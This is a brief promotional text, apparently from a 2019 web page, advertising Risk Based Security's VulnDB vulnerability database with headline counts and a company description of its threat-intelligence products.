VulnDB, by the numbers:

  • 200,000 vulnerabilities all time and growing
  • Over 4,900 vulnerabilities YTD 2019
  • Over 66,000 vulnerabilities missing from CVE
  • Over 22,000 vendors included

Learn more about VulnDB or request a demo.

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Their products, Cyber Risk Analytics (CRA) and VulnDB, provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, the YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.